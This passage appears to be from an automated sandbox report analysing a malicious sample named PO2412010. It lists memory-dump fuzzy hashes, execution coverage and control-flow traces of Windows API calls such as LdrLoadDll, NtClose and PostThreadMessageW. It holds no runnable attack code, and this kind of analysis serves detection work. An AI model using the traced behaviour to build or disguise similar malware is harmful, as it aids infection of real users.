                                                                        • Opcode Fuzzy Hash: a3bb94e3785c5c001b78e2a6e1eeb6251920db5072f684746a84366585e5febe
                                                                        • Instruction Fuzzy Hash: 38E0EC31C2461C9E9B90FE74D50459A7BE8AB05210F00C52AE9499A110EA30D2D4CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0edf964ff0f87051be7af24a062e955c1cb65de12d8d7b1995b8971120e1b536
                                                                        • Instruction ID: d28c2b5fd0627a08fc56a87a51aa0b1ef81ba2978559a7016b682ea2cc7dd303
                                                                        • Opcode Fuzzy Hash: 0edf964ff0f87051be7af24a062e955c1cb65de12d8d7b1995b8971120e1b536
                                                                        • Instruction Fuzzy Hash: A0D0A7347042048797042FB6541A3B633DEFB856013458015A30AC2189CF3CD9519622
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f87e9b0152ef7356033b58e52b737a9f0d8a2a042fd8f1d1a767a4958cc0e2bb
                                                                        • Instruction ID: d00c3058c36edb525139f9e02aeb1323a1c45236e87f5cf61e6284f04c18acfd
                                                                        • Opcode Fuzzy Hash: f87e9b0152ef7356033b58e52b737a9f0d8a2a042fd8f1d1a767a4958cc0e2bb
                                                                        • Instruction Fuzzy Hash: DEC08C3251A7812FE782E2607C60CA62B35DBE3A013080493E24482093C2240629C733
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 126d87058d3a2b7763907a637c9136d4521b41276cf27d843e23bfd802ffce90
                                                                        • Instruction ID: 9059d2df93621e661089bf8882336dff4fc1ff53838f2ff378c866aa85c5c4d1
                                                                        • Opcode Fuzzy Hash: 126d87058d3a2b7763907a637c9136d4521b41276cf27d843e23bfd802ffce90
                                                                        • Instruction Fuzzy Hash: 80C012D724C208DEBFC4A2A8152853C3AADAB88200F106407920BC3139CA12484105F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17a3f3394cd1328cb1dc3839a0e051175159248cf413f13e65d035a6a14786e0
                                                                        • Instruction ID: 025c6386718b80d63167b1a437fcb7df324d833aa93a548700de4150adf8649f
                                                                        • Opcode Fuzzy Hash: 17a3f3394cd1328cb1dc3839a0e051175159248cf413f13e65d035a6a14786e0
                                                                        • Instruction Fuzzy Hash: DED05E350001449FCB408B30C482FD8BB71EB04360F1881A5EC848B222C2329A1ACB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee3e4cbbde0038604552e21093bbdeb8037059491567d2b694f532db9a62ac23
                                                                        • Instruction ID: 24e176d2d7d2283bd8510b1c05c0348a7d0a6a06918ce36e2192f9b86ce02e73
                                                                        • Opcode Fuzzy Hash: ee3e4cbbde0038604552e21093bbdeb8037059491567d2b694f532db9a62ac23
                                                                        • Instruction Fuzzy Hash: 1AD0122105E3D3AEF782122469094733F386B0315531600D7F486DD053CA591594C3B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6458f3ad821f6b3f72ea5d647f3c2bf916832bb75a71de70feb5f5697d631e64
                                                                        • Instruction ID: 8bef9895b1d63567695cbaa5c515795b67a593fa52fbacf6d35039d9776c1d0e
                                                                        • Opcode Fuzzy Hash: 6458f3ad821f6b3f72ea5d647f3c2bf916832bb75a71de70feb5f5697d631e64
                                                                        • Instruction Fuzzy Hash: AAC08097C5CA0849F7117A74484675DFB30FB1311AF800765C8FD371D4FD1461569352
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e411addd6b32cc04669b4a925efaa336a346176b7a7a84e0f91eb4a615f59eaf
                                                                        • Instruction ID: 9be6b3eb8f148a69ef917128dce1740d4af512496d859884da7a77a23f9cccfc
                                                                        • Opcode Fuzzy Hash: e411addd6b32cc04669b4a925efaa336a346176b7a7a84e0f91eb4a615f59eaf
                                                                        • Instruction Fuzzy Hash: 2AC08C30461304C7C20067A8FA0E768BFA8AB01212F440218F048420308E643490C671
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                        • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                        • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                        • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c739e03daae79464724cafd54e658bb5bf94f1c37cdcaacf4a4bffd7fa0f1cb
                                                                        • Instruction ID: 4b927c9a5ca5673236963be180080ad621adb7fc51b22ed5e187cd59875cd0e4
                                                                        • Opcode Fuzzy Hash: 6c739e03daae79464724cafd54e658bb5bf94f1c37cdcaacf4a4bffd7fa0f1cb
                                                                        • Instruction Fuzzy Hash: 61B0122B00C30CDE3FC022D720392353E1C7304A107403012B14F308410D31149100F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd738ed3900de962deae4fec2b59963e35ea6c6775910857c0acfe8a20d34b15
                                                                        • Instruction ID: 6d1e46f4575c423f4d926e50ac3259814652afd0881ee93dac45a637c88d7356
                                                                        • Opcode Fuzzy Hash: fd738ed3900de962deae4fec2b59963e35ea6c6775910857c0acfe8a20d34b15
                                                                        • Instruction Fuzzy Hash: 6CC012B380C190CFCB42CB6ADC9AA583BF0BE2A20034818CAC0098B326E220F0108B40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba0d7c30a11e634b2b174577f358bb59d99a6b76f8c8d69aa82cfd8ebcfdab12
                                                                        • Instruction ID: 86533582ae9f8c876c2c56a9fd1c0124c7275b66559bf460508251b0bff3e703
                                                                        • Opcode Fuzzy Hash: ba0d7c30a11e634b2b174577f358bb59d99a6b76f8c8d69aa82cfd8ebcfdab12
                                                                        • Instruction Fuzzy Hash: C9B012361E9600A7798073A48EC8A3FB450EBB6700B408D1173085007C86754428D237
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03695ea689de9a8f1cb628027132fb599281b31a6a2aec9cd78b33f9ceebe805
                                                                        • Instruction ID: aad54a8cc727f12040b86f4930e27e9ef6c48d2675a3bb7a418cbf52bce5d0e6
                                                                        • Opcode Fuzzy Hash: 03695ea689de9a8f1cb628027132fb599281b31a6a2aec9cd78b33f9ceebe805
                                                                        • Instruction Fuzzy Hash: EBC04C31B64219AFFF558A51FF46D6D76757B14A00F200524B60267198D67065018690
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f0bcbe5d7c0bd274b1a22f42e9ef6454fdc71fef51aaa8e298b725b61ec3294
                                                                        • Instruction ID: 34d890c059bafb78d01999671cd4762a33703f6cef1260f303e1ac8731f7d962
                                                                        • Opcode Fuzzy Hash: 0f0bcbe5d7c0bd274b1a22f42e9ef6454fdc71fef51aaa8e298b725b61ec3294
                                                                        • Instruction Fuzzy Hash: BAA0112202820EEE3B802288A00A03A3F2C23022883000000FA0A8E020AA223820C0E8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: b7d09e31429b05b8cd1f6eb2a74e105a7c3e70ce2ee8426cf874708d40fe1869
                                                                        • Instruction ID: f28beb9b59f36013db9e68a3d3a11aaec1636d88740a50e77f7f9887576766ad
                                                                        • Opcode Fuzzy Hash: b7d09e31429b05b8cd1f6eb2a74e105a7c3e70ce2ee8426cf874708d40fe1869
                                                                        • Instruction Fuzzy Hash: AD51D371E04628CFDB25DF6ACC407DABBB2AB8A301F44D1EAD418A7254DB345A86CF41
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9cfe9a8ce769802a02d38c60a99732af8a886f2009543b2594cce0a061b2ecd8
                                                                        • Instruction ID: d8fc2c4516b066828c39615d3049ba33582f72145682438b707a65d7c09c7d95
                                                                        • Opcode Fuzzy Hash: 9cfe9a8ce769802a02d38c60a99732af8a886f2009543b2594cce0a061b2ecd8
                                                                        • Instruction Fuzzy Hash: ADE10AB4E101598FCB14DFA9C5909AEBBF6FF89305F24C169D414AB35AC730A941CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5874eca11a6aa601959bb1f7a20edae38b0aaecb1ecce5c8cf753682f62672b1
                                                                        • Instruction ID: 25a52f7ed193ec97cef4dce9718d046007812a8d789303c8ea41dbb0aebc77f8
                                                                        • Opcode Fuzzy Hash: 5874eca11a6aa601959bb1f7a20edae38b0aaecb1ecce5c8cf753682f62672b1
                                                                        • Instruction Fuzzy Hash: 68E106B4E101598FCB14DFA9C5809AEFBF6FF89305F248169E414AB359DB30A941CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 88b25a2f58449dc20b9da8d83f36cc901a0ef445b09e765faef25b02d522d82f
                                                                        • Instruction ID: 0af91c40cf162f07431c6eff122016cf24b17d46c65eb106a740574dd4afa4a6
                                                                        • Opcode Fuzzy Hash: 88b25a2f58449dc20b9da8d83f36cc901a0ef445b09e765faef25b02d522d82f
                                                                        • Instruction Fuzzy Hash: A8E1E8B4E101198FCB14DFA9C5809AEFBF6FF89305F248169E415AB35AD730A941CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 711f74c0f851fdb44662a4432b5e2f7012e8b0a0ec606f40e357aef351ab53b1
                                                                        • Instruction ID: fe74f067a9fbe138c2a163d7f41aaf3a4ff6f4ce949bed5063cc960cb4c43ba1
                                                                        • Opcode Fuzzy Hash: 711f74c0f851fdb44662a4432b5e2f7012e8b0a0ec606f40e357aef351ab53b1
                                                                        • Instruction Fuzzy Hash: F5E1E6B4E101198FCB14DFA9C5809AEFBF6FF89305F648169E414AB35ADB30A941CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d302580bb901b7e641573bfcffa818b99c2f29a2171e77a25e724e96f9d3eb2d
                                                                        • Instruction ID: be9a90c41048e23afc90a3e2165580b180acc0b952592734472833494c9e93e9
                                                                        • Opcode Fuzzy Hash: d302580bb901b7e641573bfcffa818b99c2f29a2171e77a25e724e96f9d3eb2d
                                                                        • Instruction Fuzzy Hash: 09E1C9B4E201198FCB14DFA9C9909AEFBF6FF89305F248169E414AB355DB30A941CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8cfe52d1c81d586a2de92973a7b7d6d6496ecca9c52f750d2af6f8883211b79
                                                                        • Instruction ID: ebbb3ce73b0e80907ab75e526a8af0890666fc8195dce540e6cde69723a50ece
                                                                        • Opcode Fuzzy Hash: e8cfe52d1c81d586a2de92973a7b7d6d6496ecca9c52f750d2af6f8883211b79
                                                                        • Instruction Fuzzy Hash: 47A15932E102198FCF09DFA4C9405AEB7B2FF85300B25857AF805AB265DB31E955CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99906dddce73d9d6088dfd7c7d82622488698bcbbc9e7df9475eeee1956f2854
                                                                        • Instruction ID: 2e06d9484d6f07645f4107772f4ef27864417a9885f4f10e2af8da959b674658
                                                                        • Opcode Fuzzy Hash: 99906dddce73d9d6088dfd7c7d82622488698bcbbc9e7df9475eeee1956f2854
                                                                        • Instruction Fuzzy Hash: CC51FAB4E102198FCB14CFA9C5805AEFBF6BF89305F24C169D418AB356D7319A41CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18bf3be908805d6ff3b20ae75ff9aedae8ea2911edf68943484c04ac86d9d8e8
                                                                        • Instruction ID: f5b85a371e0ad38d2057b1faae48714aa9ccfeed962e2145ecb7fd17c707e3e9
                                                                        • Opcode Fuzzy Hash: 18bf3be908805d6ff3b20ae75ff9aedae8ea2911edf68943484c04ac86d9d8e8
                                                                        • Instruction Fuzzy Hash: A5510AB4E102598BCB14DFA9C9805AEFBF6FF89304F24C16AE418A7355D7309A41CFA1

                                                                        Execution Graph

                                                                        Execution Coverage:1.2%
                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                        Signature Coverage:8%
                                                                        Total number of Nodes:138
                                                                        Total number of Limit Nodes:8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                        • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                                        • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                        • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                                        • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 390 1ac2b60-1ac2b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c03a7c5a8d1f6a95dd4aa255187f4f9eb93b53bc0c98f4a49e0ac6a90705e9d0
                                                                        • Instruction ID: de296589d0399bf82962802a68eb4dfbb35b5630c4d9e0f4f2add8611b4de6ee
                                                                        • Opcode Fuzzy Hash: c03a7c5a8d1f6a95dd4aa255187f4f9eb93b53bc0c98f4a49e0ac6a90705e9d0
                                                                        • Instruction Fuzzy Hash: 5A90026520281003410571584414616401A97E0201F56C021E1024591DC52989916226
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 65ac067b6c0b50063d2335a8b93d0a8bbed04c36c5ccba08c977dbfb6a89869d
                                                                        • Instruction ID: 3524f9f5564a400d6733bd3cdc4b0f113e141797c711dc5c66505556307bbb4b
                                                                        • Opcode Fuzzy Hash: 65ac067b6c0b50063d2335a8b93d0a8bbed04c36c5ccba08c977dbfb6a89869d
                                                                        • Instruction Fuzzy Hash: 4790023520181413D11171584504707001997D0241F96C412E0434559DD65A8A52A222

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 391 1ac2c70-1ac2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f081180436cbcd4aa18207d823045749e444bec1de3ae9a0825c38b3f4a6cc2d
                                                                        • Instruction ID: 4c8f5e964ac9caf1ef1d80db497f44eacb1a27767aac496d3d5cbb4fd4c182b2
                                                                        • Opcode Fuzzy Hash: f081180436cbcd4aa18207d823045749e444bec1de3ae9a0825c38b3f4a6cc2d
                                                                        • Instruction Fuzzy Hash: D790023520189802D1107158840474A001597D0301F5AC411E4434659DC69989917222
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cde12c4a4fd56179a35023d0fab75a163181f07374bc4c337bd499d51c79f88e
                                                                        • Instruction ID: f9047d6ccd565c986c5e695d34a7e55e24156937e84c2437fa28a70b98269290
                                                                        • Opcode Fuzzy Hash: cde12c4a4fd56179a35023d0fab75a163181f07374bc4c337bd499d51c79f88e
                                                                        • Instruction Fuzzy Hash: 4F90023560591402D10071584514706101597D0201F66C411E0434569DC7998A5166A3

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: S$l420377x$l420377x
                                                                        • API String ID: 1836367815-2727433438
                                                                        • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                        • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                                        • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                        • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: l420377x$l420377x
                                                                        • API String ID: 1836367815-444879537
                                                                        • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                        • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                                        • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                        • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: l420377x$l420377x
                                                                        • API String ID: 1836367815-444879537
                                                                        • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                        • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                                        • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                        • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                        APIs
